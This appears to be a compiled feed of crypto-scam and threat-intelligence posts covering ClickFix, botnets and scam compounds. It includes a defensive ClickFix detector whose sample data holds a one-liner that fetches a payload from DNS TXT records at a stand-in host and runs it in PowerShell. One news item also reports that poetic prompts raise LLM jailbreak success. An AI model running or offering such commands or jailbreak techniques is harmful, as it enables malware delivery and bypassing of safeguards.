Commissioner of Inland Revenue latest scam target

Inland Revenue had received more than 3000 reports of scams from the public in the three months to the end of February.

RNZ

Fake Google Gemini chatbot used to sell non-existent “Google Coin.”

AI-driven sales script + fake presale dashboard → BTC/ETH payments.

Analysis by Malwarebytes.

https://www.technadu.com/malicious-gemini-ai-chatbot-sells-fake-google-coin-in-scam-campaign/620496/

#Infosec #CryptoScam #AI #ThreatIntel

It's been a busy 24 hours in the cyber world with significant updates on the evolving "ClickFix" social engineering tactic, showing how attackers are getting creative with initial access and payload delivery. Let's take a look:

Evolving ClickFix Attacks: DNS Staging and Crypto Hijacks ⚠️

- Microsoft has detailed a new DNS-based ClickFix variant where victims are tricked into running `nslookup` commands, using DNS as a stealthy staging channel for payloads like ModeloRAT. This method blends malicious activity into normal network traffic, making detection harder.
- A separate, novel ClickFix campaign is leveraging Pastebin comments and Google Docs to socially engineer cryptocurrency users into executing malicious JavaScript directly in their browser. This allows attackers to hijack Bitcoin swap transactions and redirect funds to their wallets.
- These incidents highlight the evolving nature of ClickFix, moving beyond traditional OS-level command execution to sophisticated DNS staging and direct browser manipulation for financial theft, underscoring the critical need for user awareness and robust detection of procedural trust abuse.

📰 The Hacker News | https://thehackernews.com/2026/02/microsoft-discloses-dns-based-clickfix.html
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/pastebin-comments-push-clickfix-javascript-attack-to-hijack-crypto-swaps/

#CyberSecurity #ThreatIntelligence #SocialEngineering #ClickFix #Malware #ModeloRAT #LummaStealer #CryptoScam #InfoSec #CyberAttack #IncidentResponse

Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging

Microsoft details a new ClickFix variant abusing DNS nslookup commands to stage malware, enabling stealthy payload delivery and RAT deployment.

The Hacker News
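
The DNS-staging ClickFix variant summarised above is a detection problem as much as a user-awareness one. The following is an added example, not Microsoft's published detection logic or code from either article: it scores constructed process-creation events (field names mirror what Sysmon Event ID 1 or EDR telemetry usually carry) for a user-pasted command that pulls a payload out of DNS TXT records and feeds it to an interpreter, and it shows how the TXT fragments are reassembled into the staged bytes. The regexes, weights, threshold, sample command lines and the `stage.example.invalid` hostname are all assumptions for the example.

```python
"""Heuristic detector for nslookup-based ClickFix staging (added example, not
Microsoft's published detection logic). Scans process-creation events, which
are constructed below with the fields that Sysmon Event ID 1 / EDR telemetry
normally carry, for a user-pasted command that pulls a payload out of DNS TXT
records and hands it to an interpreter."""
import base64
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcEvent:
    image: str          # executable that was started
    parent_image: str   # executable that started it
    command_line: str   # full command line as logged


# Heuristics and weights are assumptions chosen for this example.
TXT_QUERY = re.compile(r"-(?:type|q|querytype)=txt", re.IGNORECASE)
# A leftmost label of 20+ base64/hex-looking characters is unusual for a lookup a human types.
ENCODED_LABEL = re.compile(r"(?<![\w.-])[A-Za-z0-9_-]{20,}\.[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# nslookup output captured by a for-loop or piped into something that can execute it.
CHAINED_EXEC = re.compile(
    r"for\s+/f|\|\s*(?:powershell|pwsh|cmd|mshta|iex)\b|invoke-expression", re.IGNORECASE)
# Parents that mean a person ran it (Run dialog, terminal): the ClickFix delivery path.
USER_LAUNCHED = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}


def score_event(ev: ProcEvent) -> Tuple[int, List[str]]:
    """Return (score, reasons); a score of 3 or more is treated as an alert."""
    cmd = ev.command_line
    if "nslookup" not in cmd.lower():
        return 0, []
    hits = []
    if TXT_QUERY.search(cmd):
        hits.append(("TXT record query", 1))
    if ENCODED_LABEL.search(cmd):
        hits.append(("long encoded-looking hostname label", 2))
    if CHAINED_EXEC.search(cmd):
        hits.append(("nslookup output chained into an interpreter", 2))
    if ev.parent_image.lower().rsplit("\\", 1)[-1] in USER_LAUNCHED:
        hits.append(("launched from an interactive shell or Run dialog", 1))
    return sum(w for _, w in hits), [r for r, _ in hits]


def find_alerts(events: List[ProcEvent], threshold: int = 3) -> List[Tuple[str, List[str]]]:
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append((ev.command_line, reasons))
    return alerts


def reassemble_txt(chunks: List[str]) -> bytes:
    """Join the quoted TXT strings a resolver returns (in order) and base64-decode
    them: what the pasted one-liner does before executing, and what an analyst does
    to recover the staged payload from a packet capture."""
    joined = "".join(c.strip().strip('"') for c in chunks)
    return base64.b64decode(joined, validate=True)


# Constructed sample telemetry: a benign SPF check, a ClickFix-style one-liner, an unrelated service.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\nslookup.exe", r"C:\Windows\System32\cmd.exe",
              "nslookup -type=txt example.com"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
              "cmd.exe /c \"for /f \"tokens=*\" %a in ('nslookup -type=txt "
              "aGVsbG8gd29ybGQgc3RhZ2Vy.stage.example.invalid') do powershell -nop -e %a\""),
    ProcEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\services.exe",
              "svchost.exe -k netsvcs"),
]

# Constructed TXT answer split across two strings, as a resolver would print it.
SAMPLE_TXT_CHUNKS = ['"c3Rh"', '"Z2Uy"']

if __name__ == "__main__":
    for cmd, reasons in find_alerts(SAMPLE_EVENTS):
        print("ALERT:", cmd, "->", ", ".join(reasons))
    print("staged bytes:", reassemble_txt(SAMPLE_TXT_CHUNKS))
```

The admin's plain `nslookup -type=txt example.com` scores 2 and stays quiet; the pasted one-liner scores 6 because the encoded label and the `for /f` capture into PowerShell each weigh more than the query type alone. In production the same scoring should also be applied to DNS query logs, since an attacker can drop the `-type=txt` flag and use `set type=txt` inside an interactive nslookup session.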

Has Bitcoin perhaps already ended its slide again? That would be a shame, though.
#bitcoin #scam #cryptoscam

He Leaked the Secrets of a Southeast Asian Scam Compound. Then He Had to Get Out Alive

A source trapped inside an industrial-scale scamming operation contacted me, determined to expose his captors’ crimes—and then escape. This is his story.

WIRED

Built a link-shortening tool thinking it would be fun, and it turned out I spent 90% of the time fighting spammers! After hundreds of commits, I learned: moderation has to be in place RIGHT from day one. Monitor traffic, check content carefully, restrict the free tier, shadowban, blacklist malicious domains, rate limit, verify email, and log fingerprints instead of IPs. Spammers don't sleep, and neither does the server bill! #SaaS #Spam #URLshortener #LessionLearned #AntiSpam #Phishing #CryptoScam #KhởiNghiệp #AnNinhMạng #XửLýSpam

https://www.reddit.com/r/SaaS/comme
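
The post above lists its controls without showing how they fit together. The following is an added example, not code from the poster's tool, of a submission gate combining four of them: a domain blocklist that matches parent domains, a rate limit keyed on a client fingerprint rather than the IP, an email-verification gate, and a shadowban that keeps returning success to the abuser while the link resolves to nothing for everyone else. The header names used for the fingerprint, the free-tier limit, the blocklist entries and the sample requests are all assumptions.

```python
"""Added example of the anti-abuse controls the post lists for a URL shortener.
Not the poster's code; header names, limits and blocklist entries are assumptions."""
import hashlib
import time
from collections import defaultdict, deque
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

# Constructed blocklist; a real one would be fed from abuse reports and threat feeds.
BLOCKED_DOMAINS = {"malicious.example", "phish.example"}
FINGERPRINT_HEADERS = ("User-Agent", "Accept-Language", "Accept")  # assumption: these are logged


def fingerprint(headers: Dict[str, str]) -> str:
    """Hash stable client attributes; spammers rotate IPs far more often than these."""
    raw = "|".join(headers.get(h, "") for h in FINGERPRINT_HEADERS)
    return hashlib.sha256(raw.encode()).hexdigest()[:16]


def domain_blocked(url: str) -> bool:
    """True if the host or any parent domain is on the blocklist."""
    host = (urlsplit(url).hostname or "").lower()
    labels = host.split(".")
    return any(".".join(labels[i:]) in BLOCKED_DOMAINS for i in range(len(labels)))


class SlidingWindowLimiter:
    def __init__(self, limit: int, window_s: float, clock=time.monotonic):
        self.limit, self.window, self.clock = limit, window_s, clock
        self.hits = defaultdict(deque)

    def allow(self, key: str) -> bool:
        now = self.clock()
        q = self.hits[key]
        while q and now - q[0] >= self.window:   # drop timestamps outside the window
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


class Shortener:
    def __init__(self, clock=time.monotonic, free_tier_per_minute: int = 5):
        self.links: Dict[str, Tuple[str, str, bool]] = {}   # code -> (url, owner fp, hidden)
        self.limiter = SlidingWindowLimiter(free_tier_per_minute, 60, clock)
        self.shadowbanned = set()

    def submit(self, url: str, headers: Dict[str, str], email_verified: bool) -> Tuple[str, str]:
        fp = fingerprint(headers)
        if not email_verified:
            return "rejected", "verify email first"
        if not self.limiter.allow(fp):            # counted even for junk, so spam burns quota
            return "rejected", "rate limited"
        if urlsplit(url).scheme not in ("http", "https"):
            return "rejected", "unsupported scheme"
        if domain_blocked(url):
            self.shadowbanned.add(fp)             # from now on this client's links are hidden
        hidden = fp in self.shadowbanned
        code = hashlib.sha256(f"{fp}:{url}".encode()).hexdigest()[:7]
        self.links[code] = (url, fp, hidden)
        return "created", code                    # shadowbanned submitters still see success

    def resolve(self, code: str, headers: Dict[str, str]) -> Optional[str]:
        entry = self.links.get(code)
        if entry is None:
            return None
        url, owner, hidden = entry
        if hidden and fingerprint(headers) != owner:
            return None                           # works for the spammer, dead for everyone else
        return url


class FakeClock:
    """Deterministic clock so the rate-limit window can be advanced by hand."""
    def __init__(self):
        self.t = 0.0

    def __call__(self) -> float:
        return self.t

    def advance(self, seconds: float) -> None:
        self.t += seconds


# Constructed request headers for a browser user and a scripted abuser.
BROWSER = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) Firefox/128.0",
           "Accept-Language": "en-NZ,en;q=0.9", "Accept": "text/html"}
BOT = {"User-Agent": "python-requests/2.32", "Accept-Language": "", "Accept": "*/*"}

if __name__ == "__main__":
    s = Shortener(FakeClock())
    print(s.submit("https://example.com/docs", BROWSER, True))
    status, code = s.submit("https://login.malicious.example/wallet", BOT, True)
    print(status, s.resolve(code, BOT), s.resolve(code, BROWSER))
```

The limiter counts the request before the content checks run, so a spammer burns quota on every rejected or hidden link; resolving a shadowbanned link from the submitter's own fingerprint still works, which is what keeps them from noticing and registering a fresh account.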

Prosecution opened in a cryptocurrency fraud case in which more than VND 7.4 billion was misappropriated in Ho Chi Minh City. The suspects posed as financial experts and lured victims into investing on a fake trading exchange. The case also exposed a ring organising illegal border crossings into Cambodia. #CryptoScam #LuanDaoTienSo #Campuchia #ToiPhamMang #Cybercrime #FinancialFraud #VuAnHinhSu

https://vtcnews.vn/khoi-to-vu-lua-dao-tien-dien-tu-lo-duong-day-vuot-bien-sang-campuchia-ar996989.html

Cryptocurrency fraud case prosecuted, exposing a ring smuggling people across the border into Cambodia

Posing as financial experts, the suspects misappropriated more than VND 7.4 billion from a woman in Ho Chi Minh City; the case also exposed a ring organising illegal border crossings into Cambodia.

VTC News

More than 1000 crypto-fraud domains are not reachable.
A bit lazy in the new year, we have not checked on all of them.
On 91.236.116.238. UK-WIN, in Sweden, a shithole.
The scammers are a bit lazy too, maybe:
Certificate valid:
Not Before Thu, 02 Oct 2025 11:53:37 GMT
Not After Wed, 31 Dec 2025 11:53:36 GMT
Wonder if they will show up again. And where.
A few domain checks say registered in June 2025.
mainreg as registrar, often seen in this kind of fraud setup. #cryptoscam

Alright team, it's been a pretty packed start to the year in cyber! We've got some interesting developments on active exploitation, new malware campaigns, and a couple of big names facing regulatory heat. Let's dive in:

Recent Cyber Attacks ⚠️

- Unleash Protocol, a decentralised IP platform, lost approximately $3.9 million in crypto due to an unauthorised smart contract upgrade, initiated by an external address gaining administrative control via multisig governance.
- A Lithuanian national was extradited to South Korea for infecting 2.8 million systems globally with clipboard-stealing malware, disguised as the KMSAuto Windows/Office activator, siphoning around $1.2 million in virtual assets.
- Amazon successfully blocked over 1,800 suspected North Korean operatives from infiltrating its workforce since April 2024, who were posing as IT workers or recruiters to steal credentials and source code, as DPRK crypto theft surged to $2 billion in 2025.

📰 The Hacker News | https://thehackernews.com/2026/01/threatsday-bulletin-ghostad-drain-macos.html

Actively Exploited Vulnerabilities 🛡️

- The RondoDox botnet has been actively exploiting the critical React2Shell (CVE-2025-55182, CVSS 10.0) RCE flaw in React Server Components and Next.js since December 2025, targeting IoT devices and web servers to deploy crypto miners and Mirai botnet variants.
- A coordinated campaign, primarily from Japan-based infrastructure, systematically exploited over 10 Adobe ColdFusion CVEs from 2023-2024 during Christmas 2025, leading to direct code execution, credential harvesting, and JNDI lookups.
- Researchers identified a 4-second window where AWS IAM eventual consistency allows attackers to leverage deleted access keys to create new ones, achieving persistence even after defenders believe credentials are revoked.

📰 The Hacker News | https://thehackernews.com/2026/01/rondodox-botnet-exploits-critical.html
📰 The Hacker News | https://thehackernews.com/2026/01/threatsday-bulletin-ghostad-drain-macos.html

New Threat Research & Malware Campaigns 🚨

- The GlassWorm supply chain campaign has resurfaced, now targeting macOS users with malicious Open VSX extensions (50,000 downloads) to steal funds from over 50 browser extension wallets, iCloud Keychain data, and developer credentials.
- OceanLotus (APT) is targeting China's Xinchuang initiative, exploiting CVE-2023-52076 (RCE in Atril document viewer) and deploying custom ELF Trojans specifically designed to bypass traditional Linux system checks on indigenous innovation platforms.
- The IPCola proxy network, offering 1.6 million IPs, is powered by the GaGaNode decentralised bandwidth monetization service, whose SDK contains a critical RCE vulnerability, enabling broad compromise of IoT, desktop, and mobile devices.
- Large-scale mobile adware campaigns, GhostAd (Android) and SkyWalk (iOS), are draining device resources and defrauding advertisers by running persistent background ad engines and serving invisible ads, respectively.
- Magecart attacks are evolving into full identity compromise, hijacking checkout and account creation flows with fake payment forms, phishing iframes, and anti-forensics techniques to steal credentials and personal information.
- A new cybercrime tool, ErrTraffic, automates "ClickFix" attacks by generating fake browser glitches on compromised websites, tricking users into installing information stealers or Android banking trojans.
- Kaspersky discovered 'Keenadu', a pre-installed backdoor in libandroid_runtime.so on certain Android tablet models, providing remote access for data exfiltration and command execution.

📰 The Hacker News | https://thehackernews.com/2026/01/threatsday-bulletin-ghostad-drain-macos.html

Threat Landscape & AI Concerns 🧠

- Reddit banned the r/ChatGPTJailbreak subreddit (229,000 users) for violating rules, highlighting ongoing challenges with LLM safety filters, prompt injections, and the potential for generating non-consensual deepfakes; poetic prompts were found to increase attack success rates fivefold.
- Research details "hacktivist proxy operations" where ideologically aligned non-state cyber groups conduct disruptive activities (DDoS, defacement) that align with state geopolitical interests, providing plausible deniability for the benefiting state.

📰 The Hacker News | https://thehackernews.com/2026/01/threatsday-bulletin-ghostad-drain-macos.html

Regulatory & Corporate Accountability ⚖️

- Reuters reported that Meta developed a "playbook" to mislead regulators about the prevalence of scam ads on its platform, by systematically deleting fraudulent ads from its Ad Library during regulatory searches.
- Disney agreed to pay a $10 million civil penalty to settle FTC allegations of violating children's privacy laws (COPPA) by misdesignating YouTube content, leading to unlawful data collection and targeted advertising without parental consent.

📰 The Hacker News | https://thehackernews.com/2026/01/threatsday-bulletin-ghostad-drain-macos.html

#CyberSecurity #ThreatIntelligence #Vulnerabilities #RCE #Botnet #Malware #APT #SupplyChain #Adware #AdFraud #CryptoScam #NationState #DPRK #AI #LLM #DataPrivacy #COPPA #RegulatoryCompliance #InfoSec #IncidentResponse

ThreatsDay Bulletin: GhostAd Drain, macOS Attacks, Proxy Botnets, Cloud Exploits, and 12+ Stories

The first ThreatsDay Bulletin of 2026 tracks GhostAd adware, macOS malware, proxy botnets, cloud exploits, and more emerging cyber threats.

The Hacker News

@urlyman gotta keep laundering money for Putin. #sanctionsEvasion #cryptoScam #ponziTech